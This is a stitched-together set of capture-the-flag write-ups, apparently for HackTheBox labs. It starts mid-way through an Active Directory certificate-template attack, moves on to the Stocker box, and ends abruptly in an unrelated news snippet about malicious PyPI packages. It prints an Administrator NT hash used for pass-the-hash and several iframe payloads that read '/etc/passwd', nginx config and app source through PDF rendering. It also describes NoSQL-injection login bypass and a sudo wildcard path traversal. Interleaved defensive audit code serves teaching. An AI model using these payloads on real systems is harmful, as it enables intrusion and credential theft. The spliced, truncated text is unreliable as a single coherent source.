*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> dir
Directory: C:\Users\Ryan.Cooper\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/1/2023 4:23 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> type user.txt
f******************************5
And the first flag is captured. OK, at this point the steps repeat as before. Unfortunately, also in this case, nothing with winPEAS, nothing with BloodHound, nothing with PowerScript and Rubeus; another dead end.
Exhausted, I rely on the suggestions of the forum and thus discover a new (for me) interesting tool: “just download Certify.exe”.
It looks really interesting, let’s see what comes out.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Certify.exe find /vulnerable
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2338568
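An added audit check (my example, not Certify’s code or the author’s) that takes the UserAuthentication template output above and tests the attributes that make it dangerous: the template lets the enrollee supply the subject, carries the Client Authentication EKU, requires no authorizing signature, and grants Enrollment Rights to Domain Users. It parses any Certify template block, not only this one; the sample text is the block printed above with backslashes restored, and the list of low-privilege principals is an assumption.

```python
import re

# Principals whose enrollment right makes a template reachable by any domain member (assumed list).
LOW_PRIV_PRINCIPALS = {"domain users", "domain computers", "authenticated users", "everyone"}

# Constructed sample: the UserAuthentication block as Certify prints it (backslashes restored).
SAMPLE_TEMPLATE = r"""
    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
"""


def parse_certify_template(text):
    """Turn one Certify template block into {field: [values]}.
    Continuation lines (extra principals under Enrollment Rights etc.) are
    appended to the last field; the '... Permissions' section headers are skipped."""
    fields, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if " : " in line:
            key, value = (part.strip() for part in line.split(" : ", 1))
            fields[key] = [value] if value else []
        elif line.endswith("Permissions"):
            key = None
        elif key is not None:
            fields[key].append(line)
    return fields


def principal_name(entry):
    """'sequel\\Domain Users   S-1-5-21-...-513' -> 'domain users'"""
    without_sid = re.sub(r"\s+S-1-[\d-]+$", "", entry)
    return without_sid.split("\\")[-1].strip().lower()


def audit_esc1(fields):
    """Check the four conditions that together let a low-privileged enrollee
    request a client-authentication certificate for an arbitrary subject.
    Removing any one of them (clear ENROLLEE_SUPPLIES_SUBJECT, require a
    signature or manager approval, or restrict enrollment) closes the path."""
    name_flags = " ".join(fields.get("msPKI-Certificate-Name-Flag", []))
    ekus = " ".join(fields.get("pkiextendedkeyusage", []))
    signatures = int(fields.get("Authorized Signatures Required", ["0"])[0])
    enrollers = [principal_name(e) for e in fields.get("Enrollment Rights", [])]
    low_priv = sorted(p for p in enrollers if p in LOW_PRIV_PRINCIPALS)
    conditions = {
        "enrollee_supplies_subject": "ENROLLEE_SUPPLIES_SUBJECT" in name_flags,
        "client_auth_eku": "Client Authentication" in ekus,
        "no_signature_required": signatures == 0,
        "low_priv_can_enroll": bool(low_priv),
    }
    return {
        "template": fields.get("Template Name", ["?"])[0],
        "conditions": conditions,
        "low_priv_enrollers": low_priv,
        "esc1": all(conditions.values()),
    }


if __name__ == "__main__":
    result = audit_esc1(parse_certify_template(SAMPLE_TEMPLATE))
    print(result["template"], "ESC1:", result["esc1"])
    for cond, hit in result["conditions"].items():
        print(f"  {'[x]' if hit else '[ ]'} {cond}")
```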
As in the example given in the git repository documentation, our user also seems to be enabled for the ManageCA privilege (what a coincidence). Let’s go on.
And we head straight for the root flag without delay, once again relying on Evil-WinRM, this time with the Administrator’s NT hash.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/--==## DONE ##==--]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b4c008685abf917ffbf974fddb917a8a
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And once again… that’s all folks. I sweated for a few days, but in the end I managed to overcome every obstacle (even the most trivial ones; next time, look around before heading down the most impervious routes). For the moment, goodbye, but I’ll be waiting for you at the next BOX. Happy hacking, everyone!
A simple BOX on both flags, root much more than user, still fun and great for beginners.
The nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-10 15:46 EST
Nmap scan report for 10.10.11.196
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3d12971d86bc161683608f4f06e6d54e (RSA)
| 256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_ 256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.85 seconds
It can be said that only port 80, the portal, is available. Straight towards the goal, then. Let’s put stocker.htb in the /etc/hosts file and take a look at the portal. It seems to be an e-commerce site (but there don’t seem to be any working features); let’s immediately note a possible user, “Angoose Garden, Head of IT at Stockers Ltd”, and keep that in mind. Let’s scan for hidden routes and virtual hosts.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ wfuzz -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -H "Host: FUZZ.stocker.htb" --hh "178" http://stocker.htb/
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://stocker.htb/
Total requests: 5000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 302 0 L 4 W 28 Ch "dev"
000002700: 400 7 L 12 W 166 Ch "m."
000002795: 400 7 L 12 W 166 Ch "ns2.cl.bellsouth.net."
000002883: 400 7 L 12 W 166 Ch "ns1.viviotech.net."
000002885: 400 7 L 12 W 166 Ch "ns2.viviotech.net."
000003050: 400 7 L 12 W 166 Ch "ns3.cl.bellsouth.net."
000004082: 400 7 L 12 W 166 Ch "jordan.fortwayne.com."
000004081: 400 7 L 12 W 166 Ch "ferrari.fortwayne.com."
000004083: 400 7 L 12 W 166 Ch "quatro.oweb.com."
Total time: 58.97300
Processed Requests: 5000
Filtered Requests: 4991
Requests/sec.: 84.78454
Bingo, let’s add dev.stocker.htb to the /etc/hosts file and browse the new portal. This time we find something, a login form, probably managed by a back-end in node.js.
I make some first attempts, but it doesn’t seem to be vulnerable to standard SQLi (SQL injection) attacks; even sqlmap doesn’t find anything. In addition to the technologies already mentioned, there is also the HUGO framework. I investigate.
This is a framework for creating portals, but it doesn’t seem to help me. Let’s keep it in mind; we’ll come back to it later if necessary. Let’s run another dirb session on this second domain as well.
Again nothing; I have to bypass the login first. Let’s go over what we did and think it through. Reviewing the past steps, it occurs to me that what is probably needed is not an SQLi attack but a NoSQLi one. And here I have to admit that I had some difficulty, not in finding the vulnerability, but in using the tools, where once again it turned out that doing things by hand has its benefits. Let’s proceed step by step: here are my stubborn attempts to use existing tools (because I am convinced they work better than I could), before finding the right path in that manual activity which has always paid off.
Despite everything, nothing emerges for the two most popular NoSQL databases, MongoDB and CouchDB. Let’s move on and rely on the best-stocked portal of tricks we know at the moment…
Again, however, they don’t seem to work for me. I decide on a few manual steps, so BurpSuite is a must.
Here’s the login call; still following the hacktricks guidelines, I go through all the listed payloads and finally find the right one.
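The login form fell to a NoSQL injection because the JSON the client sends is handed to the database query as-is. The following is an added example, not Stocker’s code: a login query builder in the vulnerable shape next to a hardened one that only accepts primitive strings, plus a recursive operator stripper of the kind express-mongo-sanitize applies. The request bodies, field names and limits are constructed for the example; no database connection is needed to run it.

```javascript
// Added example (not the box's code). Assumes an Express-style req.body that
// has already been JSON-parsed, and a MongoDB/Mongoose-style query object.

// Vulnerable shape: whatever the client sent is forwarded into the query.
// If a field arrives as an object instead of a string, the database evaluates
// it as a query operator and the password check stops comparing a literal.
function buildLoginQueryVulnerable(body) {
  return { username: body.username, password: body.password };
}

// Hardened shape: both fields must be primitive strings of sane length.
// Anything else is rejected before a query is even built.
function buildLoginQuerySafe(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  if (username.length === 0 || username.length > 64 || password.length > 128) {
    throw new RangeError('credential field out of range');
  }
  return { username, password };
}

// Defence in depth for endpoints that legitimately accept nested objects:
// drop any key that starts with '$' or contains '.', recursively.
function stripOperators(value) {
  if (Array.isArray(value)) return value.map(stripOperators);
  if (value && typeof value === 'object') {
    const out = {};
    for (const [k, v] of Object.entries(value)) {
      if (k.startsWith('$') || k.includes('.')) continue;
      out[k] = stripOperators(v);
    }
    return out;
  }
  return value;
}

// Constructed sample bodies (not captured from the box): an honest login and
// one whose fields carry operator objects instead of strings.
const normalBody = { username: 'alice', password: 'hunter2' };
const operatorBody = { username: { $ne: '' }, password: { $ne: '' } };

// Runs both builders over the samples and reports what each did.
function demo() {
  const results = {
    vulnerableForwardsOperator:
      typeof buildLoginQueryVulnerable(operatorBody).password === 'object',
    safeRejectsOperator: false,
    safeAcceptsNormal: false,
    stripped: stripOperators(operatorBody),
  };
  try {
    buildLoginQuerySafe(operatorBody);
  } catch (e) {
    results.safeRejectsOperator = e instanceof TypeError;
  }
  try {
    results.safeAcceptsNormal = buildLoginQuerySafe(normalBody).username === 'alice';
  } catch (e) {
    results.safeAcceptsNormal = false;
  }
  return results;
}

console.log(demo());
```

The type check is the real fix: a schema validator in front of the route (or a Mongoose schema with `String` fields and strict casting) achieves the same thing. Stripping `$` keys is a second line for endpoints that must accept objects, not a replacement for validating the login fields themselves.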
And finally, we are in. Now I can buy and request a receipt. The invoice is returned in PDF format, so there must be a conversion process. I need to understand which tools are used for the conversion, so let’s download the PDF and take a closer look at the metadata.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.196 - Stocker (lin)/attack/dwnl]
└─$ exiftool 63f7d52e1c39f5e32db2f22c.pdf
ExifTool Version Number : 12.55
File Name : 63f7d52e1c39f5e32db2f22c.pdf
Directory : .
File Size : 38 kB
File Modification Date/Time : 2023:02:23 16:07:11-05:00
File Access Date/Time : 2023:02:23 16:08:04-05:00
File Inode Change Date/Time : 2023:02:23 16:08:04-05:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Tagged PDF : Yes
Creator : Chromium
Producer : Skia/PDF m108
Create Date : 2023:02:23 21:06:00+00:00
Modify Date : 2023:02:23 21:06:00+00:00
The producer field provides us with the necessary information, so I search for “skia/pdf exploit” and immediately a series of interesting links are revealed to my eyes.
Ok, the portal cart seems to remain full; it is not emptied after the purchase, which could make my life easier. Let’s see if I can modify the data inside it in a simple and fast way.
The products are placed in a JavaScript array named basket. Just change the information it contains and make a new purchase. Let’s start by passing the most classic payload, just to understand whether the vulnerability actually exists: <iframe src=file:////etc/passwd>.
When you open the cart again, the payload we set appears.
And when we go to download the invoice, the magic happens.
To view it better, enlarge the iframe, but don’t go beyond 1000 pixels in height, or the conversion seems to fail: <iframe width='1200' height='700' src=file:////etc/passwd>.
Do you remember the name of the Head of IT? Needless to say, I immediately tried to reach the user flag file (<iframe width='1200' height='700' src=file:////home/angoose/user.txt>), but obviously to no avail. At this point the only thing I can do is look for interesting files such as configuration files, DB connection strings, credentials, etc. Let’s focus on the technologies we identified with Wappalyzer.
Trying with <iframe width='1200' height='1000' src=file:////etc/nginx/nginx.conf>:
I’d like to see a few more lines of the file, but I think this is a good starting point: the path where the portal is published. Let’s cross this information with the fact that the back-end is in node.js and try the most common filenames used for a project like this: app.js, server.js and index.js.
Even small things like this sometimes make the attack easy for a hacker: always change settings like these, if only to make a hypothetical hacker’s attack a little more complicated.
And using <iframe width='1200' height='1000' src=file:////var/www/dev/index.js>:
In addition to the MongoDB address, in which the application user’s credentials are plainly visible, I have also reported the block of code used for the login, where the point we attacked with the NoSQLi payload can be seen. Clearly there is no dev user with shell access, but knowing the nature of the box, we can simply try that password against the user in the list (/etc/passwd) who can use a shell, obviously excluding root.
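The file read above works because the invoice is rendered from the basket the client submits, and whatever is in a product title becomes HTML that the headless browser then turns into a PDF. The following is an added example, not Stocker’s code: a receipt renderer in that vulnerable shape next to a hardened one that resolves each item from a server-side catalogue, validates the quantity and escapes every string before it reaches the template. The catalogue, the item shape (`_id`, `title`, `price`, `amount`) and the sample basket are constructed for the example.

```javascript
// Added example (not the box's code). The fix does not depend on the PDF
// engine (Chromium/Skia on the box): it keeps client data out of the markup.

// Minimal HTML entity escaping for text placed inside element content or
// quoted attribute values.
const escapeHtml = (s) => String(s)
  .replace(/&/g, '&amp;')
  .replace(/</g, '&lt;')
  .replace(/>/g, '&gt;')
  .replace(/"/g, '&quot;')
  .replace(/'/g, '&#39;');

// Server-side source of truth (constructed): titles and prices come from
// here, never from the request.
const CATALOG = new Map([
  ['p1', { title: 'Cup', price: 32 }],
  ['p2', { title: 'Bin', price: 50 }],
]);

// Vulnerable pattern: the client's own title and price are interpolated into
// the template, so any markup in the title (an <iframe> pointing at a local
// file, say) is rendered by the browser that produces the PDF.
function renderReceiptVulnerable(basket) {
  const rows = basket.map(
    (it) => `<tr><td>${it.title}</td><td>${it.price}</td><td>${it.amount}</td></tr>`,
  );
  return `<table>${rows.join('')}</table>`;
}

// Hardened pattern: look the product up by id, validate the quantity, and
// escape every string that reaches the template.
function renderReceiptSafe(basket) {
  const rows = [];
  for (const it of basket) {
    const product = CATALOG.get(String(it._id));
    if (!product) throw new Error(`unknown product ${escapeHtml(it._id)}`);
    const amount = Number(it.amount);
    if (!Number.isInteger(amount) || amount < 1 || amount > 100) {
      throw new RangeError('bad amount');
    }
    rows.push(
      `<tr><td>${escapeHtml(product.title)}</td><td>${product.price}</td><td>${amount}</td></tr>`,
    );
  }
  return `<table>${rows.join('')}</table>`;
}

// Constructed basket: one honest item and one whose title carries markup and
// whose price has been zeroed client-side.
const tamperedBasket = [
  { _id: 'p1', title: 'Cup', price: 32, amount: 1 },
  { _id: 'p2', title: '<iframe src=file:////etc/passwd>', price: 0, amount: 1 },
];

// Renders the same basket both ways and reports the difference.
function compare() {
  const vuln = renderReceiptVulnerable(tamperedBasket);
  const safe = renderReceiptSafe(tamperedBasket);
  return {
    vulnerableContainsIframe: vuln.includes('<iframe'),
    safeContainsIframe: safe.includes('<iframe'),
    safeUsesCataloguePrice: safe.includes('<td>50</td>'),
    safe,
  };
}

console.log(compare());
```

Escaping alone would already neutralise the iframe, but resolving the item from the catalogue also closes the price-tampering problem the same basket array invites. A template engine with auto-escaping on (EJS `<%= %>`, Pug, Handlebars `{{ }}`) gives the same protection as `escapeHtml` here; string concatenation into HTML is what to look for in review.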
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.196 - Stocker (lin)]
└─$ ssh angoose@10.10.11.196
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password:
Last login: Sun Feb 26 08:00:16 2023 from 10.10.14.45
-bash-5.0$ whoami
angoose
-bash-5.0$ pwd
/home/angoose
-bash-5.0$ ls -la
total 76
drwxr-xr-x 7 angoose angoose 4096 Feb 26 08:05 .
drwxr-xr-x 3 root root 4096 Dec 23 16:39 ..
drwxrwxr-x 2 angoose angoose 4096 Feb 26 04:18 aaaa
lrwxrwxrwx 1 root root 9 Dec 6 09:54 .bash_history -> /dev/null
-rw-r--r-- 1 angoose angoose 220 Dec 6 09:53 .bash_logout
-rw-r--r-- 1 angoose angoose 3771 Dec 6 09:53 .bashrc
drwx------ 2 angoose angoose 4096 Feb 26 02:06 .cache
-rw-rw-r-- 1 angoose angoose 86 Feb 26 04:32 exploit.js
-rw-rw-r-- 1 angoose angoose 205 Feb 26 04:32 exploit.js.bak
-rwxr-xr-x 1 angoose angoose 3123 Feb 26 04:10 index.js
drwxrwxr-x 3 angoose angoose 4096 Feb 26 02:11 .local
lrwxrwxrwx 1 angoose angoose 32 Feb 26 04:09 node_modules -> /usr/local/scripts/node_modules/
drwxrwxr-x 3 angoose angoose 4096 Feb 26 04:18 .npm
-rw-r--r-- 1 angoose angoose 807 Dec 6 09:53 .profile
-rwxr-xr-x 1 angoose angoose 623 Feb 26 04:10 schema.js
-rwxr-xr-x 1 angoose angoose 367 Feb 26 04:11 script.js
drwxrwxr-x 2 angoose angoose 4096 Feb 26 05:35 temp
-rw-r----- 1 root angoose 33 Feb 25 21:21 user.txt
-rw------- 1 angoose angoose 9506 Feb 26 08:05 .viminfo
-bash-5.0$ cat user.txt
7******************************7
-bash-5.0$
And the first flag is captured. The next step is really fast; not even an advanced scan was needed. Let’s look at what this user can do as root.
-bash-5.0$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User angoose may run the following commands on stocker:
(ALL) /usr/bin/node /usr/local/scripts/*.js
Apparently, we can run node scripts contained in a particular folder. That asterisk, however, leaves an unequivocal path traversal open. So I prepare my malicious script. I initially tried to spawn a shell as root, but quickly reverted (child_process didn’t seem to work), so I chose a script that simply reads the root flag file.
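The reason the asterisk is enough: sudo matches wildcards in the command path without crossing a `/`, but a wildcard in a command line argument matches any string, slashes and `..` included, so `/usr/local/scripts/*.js` accepts a path that only starts under that directory. The following is an added example, not from the box: a small audit that parses `sudo -l` style rule lines and flags wildcards in arguments, plus the canonicalisation check a wrapper script would need if the rule had to stay. The rule set is constructed apart from the one line taken from the box’s output above.

```javascript
// Added example (not from the box). Pure string handling; nothing here touches
// the filesystem or sudo itself.

// Normalise an absolute POSIX path by resolving '.' and '..' segments.
// Symlinks are not followed (a real wrapper would use fs.realpathSync).
function normalizeAbs(p) {
  const out = [];
  for (const seg of p.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { out.pop(); continue; }
    out.push(seg);
  }
  return '/' + out.join('/');
}

// True when `candidate` canonicalises to a location inside `allowedDir`.
// This is the check a glob like /usr/local/scripts/*.js does not perform.
function resolvesUnder(allowedDir, candidate) {
  const base = normalizeAbs(allowedDir) + '/';
  return normalizeAbs(candidate).startsWith(base);
}

// Parse one "(runas) [TAG:...] command [args...]" line as printed by `sudo -l`
// and report whether any *argument* carries a wildcard. Wildcards in the
// command path itself are left alone because sudo does not let them match '/'.
function auditRule(line) {
  const open = line.indexOf('(');
  const close = line.indexOf(')');
  if (open !== 0 || close < 0) return { line, parsed: false };
  const runas = line.slice(open + 1, close).trim();
  const tokens = line.slice(close + 1).trim().split(/\s+/).filter(Boolean);
  const tags = [];
  while (tokens.length && tokens[0].endsWith(':')) tags.push(tokens.shift());
  if (!tokens.length) return { line, parsed: false };
  const command = tokens.shift();
  const args = tokens;
  const wildcardArgs = args.filter((a) => /[*?[]/.test(a));
  return {
    line, parsed: true, runas, tags, command, args, wildcardArgs,
    risky: wildcardArgs.length > 0,
  };
}

// Constructed rule set; the first entry is the one seen on the box.
const RULES = [
  '(ALL) /usr/bin/node /usr/local/scripts/*.js',
  '(ALL) NOPASSWD: /usr/bin/systemctl restart nginx',
  '(root : root) /usr/local/bin/backup.sh',
];

// Audit every rule and return only the findings a reviewer needs to act on.
function audit(rules = RULES) {
  return rules.map(auditRule).filter((r) => !r.parsed || r.risky);
}

console.log(audit());
// A path that escapes the allowed directory through '..' is rejected by the
// canonicalisation check even though it would satisfy the glob.
console.log(resolvesUnder('/usr/local/scripts', '/usr/local/scripts/../../../home/angoose/exploit.js'));
```

The durable fix is the one the audit points at: list the permitted scripts explicitly in sudoers instead of a wildcard, or have the rule run a fixed wrapper that performs the `resolvesUnder` check (with `realpath`) before handing the argument to node. On a system with a rule like this already in place, `sudo -l` output for each user is the quickest thing to grep for `*` in the argument position.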
Cybersecurity researchers have warned of a malicious campaign targeting users of the Python Package Index (PyPI) repository with bogus libraries masquerading as “time” related utilities, but harboring hidden functionality to steal sensitive data such as cloud access tokens.
Software supply chain security firm ReversingLabs said it discovered two sets of packages totaling 20 of them. The packages